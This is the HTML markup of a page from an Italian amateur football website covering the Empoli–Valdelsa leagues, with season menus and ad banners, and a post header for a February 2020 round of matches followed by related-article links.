	<ul class="sub-menu">
		<li id="menu-item-9698" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9698"><a href="http://www.calcioui.eu/calendario-girone-d/">CALENDARIO</a></li>
		<li id="menu-item-9701" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9701"><a href="http://www.calcioui.eu/classifica-girone-d-20162017/">CLASSIFICA</a></li>
		<li id="menu-item-12138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12138"><a href="http://www.calcioui.eu/girone-d-20162017/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-9708" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-9708"><a href="http://WWW.CALCIOUI.EU">GIRONE E</a>
	<ul class="sub-menu">
		<li id="menu-item-9699" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9699"><a href="http://www.calcioui.eu/calendario-girone-e/">CALENDARIO</a></li>
		<li id="menu-item-9702" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9702"><a href="http://www.calcioui.eu/classifica-girone-20162017-2/">CLASSIFICA</a></li>
		<li id="menu-item-12139" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-12139"><a href="http://www.calcioui.eu/girone-e-20162017/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-9711" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-9711"><a href="http://W">BOLLETTINO</a>
	<ul class="sub-menu">
		<li id="menu-item-9712" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9712"><a href="http://www.calcioui.eu/comunicati-ufficiali-dalla-lega-20162017/">EMPOLI</a></li>
		<li id="menu-item-9713" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9713"><a href="http://www.calcioui.eu/comunicati-ufficiali-regionali-20162017/">REGIONALE</a></li>
	</ul>
</li>
	<li id="menu-item-11951" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-11951"><a href="http://www.calcioui.eu">LE REPLICHE DI RADIO LADY</a>
	<ul class="sub-menu">
		<li id="menu-item-11953" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11953"><a href="http://www.calcioui.eu/40-recupero/">40 + RECUPERO</a></li>
		<li id="menu-item-11952" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11952"><a href="http://www.calcioui.eu/minutoxminuto/">MINUTOxMINUTO</a></li>
	</ul>
</li>
</ul>
</li>
<li id="menu-item-17135" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-17135"><a href="http://www.calcioui.eu">STAGIONE 2017/2018</a>
<ul class="sub-menu">
	<li id="menu-item-17136" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-17136"><a href="http://www.calcioui.eu">GIRONE A</a>
	<ul class="sub-menu">
		<li id="menu-item-17137" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17137"><a href="http://www.calcioui.eu/calendario-girone-20172018/">CALENDARIO</a></li>
		<li id="menu-item-17138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17138"><a href="http://www.calcioui.eu/classifica-girone-20172018/">CLASSIFICA</a></li>
		<li id="menu-item-17139" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17139"><a href="http://www.calcioui.eu/marcatori-girone-1718/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-17140" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-17140"><a href="http://www.calcioui.eu">GIRONE B</a>
	<ul class="sub-menu">
		<li id="menu-item-17141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17141"><a href="http://www.calcioui.eu/calendario-girone-b-20172018/">CALENDARIO</a></li>
		<li id="menu-item-17143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17143"><a href="http://www.calcioui.eu/classifica-girone-b-20172018/">CLASSIFICA</a></li>
		<li id="menu-item-17142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17142"><a href="http://www.calcioui.eu/marcatori-girone-b-1718/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-17435" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-17435"><a href="http://www.calcioui.eu">GIRONE C</a>
	<ul class="sub-menu">
		<li id="menu-item-17436" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17436"><a href="http://www.calcioui.eu/calendario-girone-c-20172018/">CALENDARIO</a></li>
		<li id="menu-item-17437" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17437"><a href="http://www.calcioui.eu/marcatori-girone-c-1718/">MARCATORI</a></li>
		<li id="menu-item-17438" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17438"><a href="http://www.calcioui.eu/classifica-girone-c-20172018/">CLASSIFICA</a></li>
	</ul>
</li>
	<li id="menu-item-17439" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-17439"><a href="http://www.calcioui.eu">GIRONE D</a>
	<ul class="sub-menu">
		<li id="menu-item-17441" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17441"><a href="http://www.calcioui.eu/calendario-girone-d-20172018/">CALENDARIO</a></li>
		<li id="menu-item-17442" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17442"><a href="http://www.calcioui.eu/classifica-girone-d-2012018/">CLASSIFICA</a></li>
		<li id="menu-item-17440" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17440"><a href="http://www.calcioui.eu/marcatori-girone-d-1718/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-17443" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-17443"><a href="http://www.calcioui.eu">GIRONE E</a>
	<ul class="sub-menu">
		<li id="menu-item-17444" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17444"><a href="http://www.calcioui.eu/calendario-girone-20172018-2/">CALENDARIO</a></li>
		<li id="menu-item-17445" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17445"><a href="http://www.calcioui.eu/classifica-girone-20172018-2/">CLASSIFICA</a></li>
		<li id="menu-item-17446" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17446"><a href="http://www.calcioui.eu/marcatori-girone-1718-2/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-17447" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-17447"><a href="http://www.calcioui.eu">BOLLETTINO</a>
	<ul class="sub-menu">
		<li id="menu-item-17448" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17448"><a href="http://www.calcioui.eu/c-u-lega-calcio-20172018/">EMPOLI</a></li>
		<li id="menu-item-17449" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17449"><a href="http://www.calcioui.eu/c-u-lega-calcio-regionale-20172018/">REGIONALE</a></li>
	</ul>
</li>
	<li id="menu-item-17458" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-17458"><a href="http://www.calcioui.eu">CLASSIFICA PORTIERI</a>
	<ul class="sub-menu">
		<li id="menu-item-17461" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17461"><a href="http://www.calcioui.eu/serie-portieri-17-18/">SERIE A</a></li>
		<li id="menu-item-17460" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17460"><a href="http://www.calcioui.eu/serie-b-portieri-1718/">SERIE B</a></li>
		<li id="menu-item-17459" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17459"><a href="http://www.calcioui.eu/lega-ama-portieri-1718/">LEGA AMA</a></li>
	</ul>
</li>
</ul>
</li>
<li id="menu-item-22097" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-22097"><a href="http://www.calcioui.eu">STAGIONE 2018/2019</a>
<ul class="sub-menu">
	<li id="menu-item-22098" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-22098"><a href="http://www.calcioui.eu">GIRONE A</a>
	<ul class="sub-menu">
		<li id="menu-item-22120" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22120"><a href="http://www.calcioui.eu/calendario-girone-2018-2019/">CALENDARIO</a></li>
		<li id="menu-item-22108" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22108"><a href="http://www.calcioui.eu/classifica-girone-2018-2019/">CLASSIFICA</a></li>
		<li id="menu-item-22115" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22115"><a href="http://www.calcioui.eu/marcatori-girone-18-19/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-22099" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-22099"><a href="http://www.calcioui.eu">GIRONE B</a>
	<ul class="sub-menu">
		<li id="menu-item-22112" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22112"><a href="http://www.calcioui.eu/calendario-girone-b-2018-2019/">CALENDARIO</a></li>
		<li id="menu-item-22107" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22107"><a href="http://www.calcioui.eu/classifica-girone-b-2018-2019/">CLASSIFICA</a></li>
		<li id="menu-item-22116" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22116"><a href="http://www.calcioui.eu/marcatori-girone-b-18-19/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-22100" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-22100"><a href="http://www.calcioui.eu">GIRONE C</a>
	<ul class="sub-menu">
		<li id="menu-item-22111" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22111"><a href="http://www.calcioui.eu/calendario-girone-c-2018-2019/">CALENDARIO</a></li>
		<li id="menu-item-22106" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22106"><a href="http://www.calcioui.eu/classifica-girone-c-2018-2019/">CLASSIFICA</a></li>
		<li id="menu-item-22117" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22117"><a href="http://www.calcioui.eu/marcatori-girone-c-17-18/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-22103" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-22103"><a href="http://www.calcioui.eu">GIRONE D</a>
	<ul class="sub-menu">
		<li id="menu-item-22110" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22110"><a href="http://www.calcioui.eu/calendario-girone-d-2018-2019/">CALENDARIO</a></li>
		<li id="menu-item-22105" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22105"><a href="http://www.calcioui.eu/classifica-girone-d-2018-2019/">CLASSIFICA</a></li>
		<li id="menu-item-22118" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22118"><a href="http://www.calcioui.eu/marcatori-girone-d-18-19/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-22101" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-22101"><a href="http://www.calcioui.eu">GIRONE E</a>
	<ul class="sub-menu">
		<li id="menu-item-22109" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22109"><a href="http://www.calcioui.eu/calendario-girone-2018-2019-2/">CALENDARIO</a></li>
		<li id="menu-item-22104" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22104"><a href="http://www.calcioui.eu/classifica-girone-2018-2019-2/">CLASSIFICA</a></li>
		<li id="menu-item-22119" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22119"><a href="http://www.calcioui.eu/marcatori-girone-18-19-2/">MARCATORI</a></li>
	</ul>
</li>
	<li id="menu-item-22121" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-22121"><a href="http://www.calcioui.eu">BOLLLETTINO</a>
	<ul class="sub-menu">
		<li id="menu-item-22123" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22123"><a href="http://www.calcioui.eu/c-u-lega-calcio-2018-2019/">EMPOLI</a></li>
		<li id="menu-item-22124" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22124"><a href="http://www.calcioui.eu/c-u-lega-calcio-regionale-2018-2019/">REGIONALE</a></li>
	</ul>
</li>
</ul>
</li>
															
					</ul><!-- .secondary-menu -->
				
					<ul class="social-menu">
						
												
					</ul><!-- .social-menu -->
				
				<div class="clear"></div>
				
				</div><!-- .section-inner -->
				
			</div><!-- .top-nav -->
			
				
		<div class="search-container">
			
			<div class="section-inner">
			
				<form method="get" class="search-form" id="search-form" action="http://www.calcioui.eu/">
	<input type="search" class="search-field" placeholder="Search form" name="s" id="s" /> 
	<button type="submit" class="search-button"><div class="fa fw fa-search"></div></button>
</form>			
			</div><!-- .section-inner -->
			
		</div><!-- .search-container -->
		
		<div class="header-wrapper">
		
			<div class="header">
					
				<div class="section-inner">
				
									
				        <a class="blog-logo" href='http://www.calcioui.eu/' title='Calcio Ui &mdash; Calcio amatoriale empolese valdelsa' rel='home'>
				        	<img src='http://www.calcioui.eu/wp-content/uploads/2020/01/LOGO-PICCOLO-2020.png' alt='Calcio Ui'>
				        </a>
				
										
					<div class="nav-toggle">
						
						<div class="bars">
							<div class="bar"></div>
							<div class="bar"></div>
							<div class="bar"></div>
						</div>
						
					</div><!-- .nav-toggle -->
				
				</div><!-- .section-inner -->
				
			</div><!-- .header -->
			
			<div class="navigation">
				
				<div class="section-inner">
					
					<ul class="primary-menu">
						
						<li id="menu-item-1067" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1067"><a href="#">GIRONE A</a>
<ul class="sub-menu">
	<li id="menu-item-22133" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22133"><a href="http://www.calcioui.eu/calendario-girone-2018-2019-3/">CALENDARIO</a></li>
	<li id="menu-item-22153" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22153"><a href="http://www.calcioui.eu/classifica-girone-2018-2019-3/">CLASSIFICA</a></li>
	<li id="menu-item-22170" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22170"><a href="http://www.calcioui.eu/marcatori-girone-18-19-3/">MARCATORI</a></li>
</ul>
</li>
<li id="menu-item-1173" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1173"><a href="#">GIRONE B</a>
<ul class="sub-menu">
	<li id="menu-item-22136" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22136"><a href="http://www.calcioui.eu/calendario-girone-2018-2019-3-2/">CALENDARIO</a></li>
	<li id="menu-item-22156" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22156"><a href="http://www.calcioui.eu/classifica-girone-b-2018-2019-2/">CLASSIFICA</a></li>
	<li id="menu-item-22173" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22173"><a href="http://www.calcioui.eu/marcatori-girone-b-18-19-2/">MARCATORI</a></li>
</ul>
</li>
<li id="menu-item-1174" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1174"><a href="#">GIRONE C</a>
<ul class="sub-menu">
	<li id="menu-item-22145" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22145"><a href="http://www.calcioui.eu/calendario-girone-c-2018-2019-2/">CALENDARIO</a></li>
	<li id="menu-item-22159" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22159"><a href="http://www.calcioui.eu/classifica-girone-c-2018-2019-2/">CLASSIFICA</a></li>
	<li id="menu-item-22176" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22176"><a href="http://www.calcioui.eu/marcatori-girone-b-18-19-2-2/">MARCATORI</a></li>
</ul>
</li>
<li id="menu-item-1175" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1175"><a href="#">GIRONE D</a>
<ul class="sub-menu">
	<li id="menu-item-22162" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22162"><a href="http://www.calcioui.eu/classifica-girone-d-2018-2019-2/">CLASSIFICA</a></li>
	<li id="menu-item-22139" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22139"><a href="http://www.calcioui.eu/calendario-girone-2018-2019-3-2-2/">CALENDARIO</a></li>
	<li id="menu-item-22179" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22179"><a href="http://www.calcioui.eu/marcatori-girone-b-18-19-2-2-2/">MARCATORI</a></li>
</ul>
</li>
<li id="menu-item-1176" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1176"><a href="#">GIRONE E</a>
<ul class="sub-menu">
	<li id="menu-item-22142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22142"><a href="http://www.calcioui.eu/calendario-girone-2018-2019-3-2-2-2/">CALENDARIO</a></li>
	<li id="menu-item-22167" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22167"><a href="http://www.calcioui.eu/classifica-girone-2018-2019-2-2/">CLASSIFICA</a></li>
	<li id="menu-item-22182" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22182"><a href="http://www.calcioui.eu/marcatori-girone-18-19-3-2/">MARCATORI</a></li>
</ul>
</li>
<li id="menu-item-1068" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1068"><a href="http://www.calcioui.eu/comunicati-ufficiali-dalla-lega/">C.U.</a>
<ul class="sub-menu">
	<li id="menu-item-22127" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22127"><a href="http://www.calcioui.eu/c-u-lega-calcio-2018-2019-2/">EMPOLI</a></li>
	<li id="menu-item-22130" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22130"><a href="http://www.calcioui.eu/c-u-lega-calcio-regionale-2018-2019-2/">REGIONALE &#8211; COPPA TOSCANA &#8211;</a></li>
</ul>
</li>
<li id="menu-item-17847" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17847"><a href="http://www.calcioui.eu/modulistica/">MODULI</a></li>
<li id="menu-item-18823" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-18823"><a href="http://www.calcioui.eu">COPPA TOSCANA</a>
<ul class="sub-menu">
	<li id="menu-item-18807" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18807"><a href="http://www.calcioui.eu/coppa-toscana-partecipanti-2018-2/">PARTECIPANTI</a></li>
	<li id="menu-item-18820" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18820"><a href="http://www.calcioui.eu/calendario-1a-giornata/">CALENDARIO 1A GIORNATA 18/19</a></li>
</ul>
</li>
<li id="menu-item-18899" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18899"><a href="http://www.calcioui.eu/app/">APP</a></li>
															
					</ul>
					
					<div class="clear"></div>
					
				</div>
				
			</div><!-- .navigation -->
				
			<ul class="mobile-menu">
				
				<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1067"><a href="#">GIRONE A</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22133"><a href="http://www.calcioui.eu/calendario-girone-2018-2019-3/">CALENDARIO</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22153"><a href="http://www.calcioui.eu/classifica-girone-2018-2019-3/">CLASSIFICA</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22170"><a href="http://www.calcioui.eu/marcatori-girone-18-19-3/">MARCATORI</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1173"><a href="#">GIRONE B</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22136"><a href="http://www.calcioui.eu/calendario-girone-2018-2019-3-2/">CALENDARIO</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22156"><a href="http://www.calcioui.eu/classifica-girone-b-2018-2019-2/">CLASSIFICA</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22173"><a href="http://www.calcioui.eu/marcatori-girone-b-18-19-2/">MARCATORI</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1174"><a href="#">GIRONE C</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22145"><a href="http://www.calcioui.eu/calendario-girone-c-2018-2019-2/">CALENDARIO</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22159"><a href="http://www.calcioui.eu/classifica-girone-c-2018-2019-2/">CLASSIFICA</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22176"><a href="http://www.calcioui.eu/marcatori-girone-b-18-19-2-2/">MARCATORI</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1175"><a href="#">GIRONE D</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22162"><a href="http://www.calcioui.eu/classifica-girone-d-2018-2019-2/">CLASSIFICA</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22139"><a href="http://www.calcioui.eu/calendario-girone-2018-2019-3-2-2/">CALENDARIO</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22179"><a href="http://www.calcioui.eu/marcatori-girone-b-18-19-2-2-2/">MARCATORI</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1176"><a href="#">GIRONE E</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22142"><a href="http://www.calcioui.eu/calendario-girone-2018-2019-3-2-2-2/">CALENDARIO</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22167"><a href="http://www.calcioui.eu/classifica-girone-2018-2019-2-2/">CLASSIFICA</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22182"><a href="http://www.calcioui.eu/marcatori-girone-18-19-3-2/">MARCATORI</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1068"><a href="http://www.calcioui.eu/comunicati-ufficiali-dalla-lega/">C.U.</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22127"><a href="http://www.calcioui.eu/c-u-lega-calcio-2018-2019-2/">EMPOLI</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22130"><a href="http://www.calcioui.eu/c-u-lega-calcio-regionale-2018-2019-2/">REGIONALE &#8211; COPPA TOSCANA &#8211;</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17847"><a href="http://www.calcioui.eu/modulistica/">MODULI</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-18823"><a href="http://www.calcioui.eu">COPPA TOSCANA</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18807"><a href="http://www.calcioui.eu/coppa-toscana-partecipanti-2018-2/">PARTECIPANTI</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18820"><a href="http://www.calcioui.eu/calendario-1a-giornata/">CALENDARIO 1A GIORNATA 18/19</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-18899"><a href="http://www.calcioui.eu/app/">APP</a></li>
				
			</ul><!-- .mobile-menu -->
				
		</div><!-- .header-wrapper -->
		<div align="center">		
		<aside id="adrotate_widgets-11" class="widget adrotate_widgets"><div class="g g-2"><div class="g-dyn a-48 c-1"><a href="https://tinghimotors.concessionaria.renault.it"target="_blank"><img class="alignnone" src=" http://www.calcioui.eu/wp-content/uploads/2020/01/CAPTUR-NO-OPO-GENNAIO-728x90.gif" width="728" height="90" /></a></div><div class="g-dyn a-21 c-2"><a href="http://www.ageallianz.it/empoli603000/"target="_blank"><img class="alignnone" src="http://www.calcioui.eu/wp-content/uploads/2017/06/allianz-EMPOLI-CENTRO.jpg" width="1199" height="90" /></a></div><div class="g-dyn a-41 c-3"><a href="https://www.publicspeakingpervendere.it"target="_blank"><img class="alignnone" src=" http://www.calcioui.eu/wp-content/uploads/2018/11/BANNER-PSXV-2.png" width="1200" height="90" /></a></div><div class="g-dyn a-46 c-4"><div id='hbagency_space_902' ></div>
<script>if( typeof hbManager !== "undefined" ) hbManager.renderAd('hbagency_space_902');</script></div><div class="g-dyn a-9 c-5"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- PROVA GRUPPO -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-8469778265829532"
     data-ad-slot="9250370000"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>

<div class="wrapper section-inner">
	
	<div class="content">
												        
				
				<div id="post-24550" class="single single-post post-24550 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-amatori-empoli tag-area-ui tag-calcio-maggiore tag-calcio-ui tag-cdp-limite tag-risultati-del-week-end tag-scalese">
					
					<div class="post-header">
											
													<p class="post-categories"><a href="http://www.calcioui.eu/category/news/" rel="category tag">NEWS</a></p>
							<h1 class="post-title">SABATO UI,  6A GIORNATA DI RITORNO</h1>						
							<div class="post-meta">

								<span class="resp">Posted</span> <span class="post-meta-author">by <a href="http://www.calcioui.eu/author/admin/">admin</a></span> <span class="post-meta-date">on <a href="http://www.calcioui.eu/2020/02/08/6a-di-ritorno/">8 Febbraio 2020</a></span> 
																	<span class="post-comments">
										<a href="http://www.calcioui.eu/2020/02/08/6a-di-ritorno/#respond"><span class="fa fw fa-comment"></span>0<span class="resp"> Comments</span></a>									</span>
								
							</div><!-- .post-meta -->

												
					</div><!-- .post-header -->
					
								
						<div class="post-image">
								
							<img width="816" height="612" src="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?fit=816%2C612" class="attachment-post-image size-post-image wp-post-image" alt="" srcset="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?w=1600 1600w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?resize=300%2C225 300w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?resize=768%2C576 768w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?resize=1024%2C768 1024w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?resize=816%2C612 816w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/WhatsApp-Image-2020-02-08-at-14.34.33.jpeg?w=1232 1232w" sizes="(max-width: 816px) 100vw, 816px" />							
						</div><!-- .post-image -->
							
										
					<div class="clear"></div>

							
		<div class="related-posts">
			
			<p class="related-posts-title">Read Next &rarr;</p>
			
			<div class="row">
							
								
						<a class="related-post" href="http://www.calcioui.eu/2020/02/08/tris-ciddippino-il-martignana-e-ko/" title="TRIS CIDDIPPINO, IL MARTIGNANA E&#8217; KO">
							
															
								<img width="400" height="200" src="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2019/10/ANTICIPI-GIRONE-A.png?resize=400%2C200" class="attachment-post-image-thumb size-post-image-thumb wp-post-image" alt="" srcset="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2019/10/ANTICIPI-GIRONE-A.png?resize=400%2C200 400w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2019/10/ANTICIPI-GIRONE-A.png?zoom=2&amp;resize=400%2C200 800w" sizes="(max-width: 400px) 100vw, 400px" />								
														
							<p class="category">
								NEWS							</p>
					
							<h3 class="title">TRIS CIDDIPPINO, IL MARTIGNANA E&#8217; KO</h3>
								
						</a>
					
										
						<a class="related-post" href="http://www.calcioui.eu/2020/02/07/le-gufate-della-redazione-73/" title="LE GUFATE DELLA REDAZIONE">
							
															
								<img width="400" height="200" src="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2017/10/gufate.png?resize=400%2C200" class="attachment-post-image-thumb size-post-image-thumb wp-post-image" alt="" srcset="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2017/10/gufate.png?resize=400%2C200 400w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2017/10/gufate.png?zoom=2&amp;resize=400%2C200 800w" sizes="(max-width: 400px) 100vw, 400px" />								
														
							<p class="category">
								LEGA AMA							</p>
					
							<h3 class="title">LE GUFATE DELLA REDAZIONE</h3>
								
						</a>
					
										
						<a class="related-post" href="http://www.calcioui.eu/2020/02/07/avanti-e-cerbaie-casa-culturale-e-ferruzza/" title="AVANTI E CERBAIE, CASA CULTURALE E FERRUZZA">
							
															
								<img width="400" height="200" src="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/CAPRIOLA.jpg?resize=400%2C200" class="attachment-post-image-thumb size-post-image-thumb wp-post-image" alt="" srcset="https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/CAPRIOLA.jpg?resize=400%2C200 400w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/CAPRIOLA.jpg?zoom=2&amp;resize=400%2C200 800w, https://i0.wp.com/www.calcioui.eu/wp-content/uploads/2020/02/CAPRIOLA.jpg?zoom=3&amp;resize=400%2C200 1200w" sizes="(max-width: 400px) 100vw, 400px" />								
														
							<p class="category">
								COPPA TOSCANA							</p>
					
							<h3 class="title">AVANTI E CERBAIE, CASA CULTURALE E FERRUZZA</h3>
								
						</a>
					
									
			</div><!-- .row -->

		</div><!-- .related-posts -->
		
									
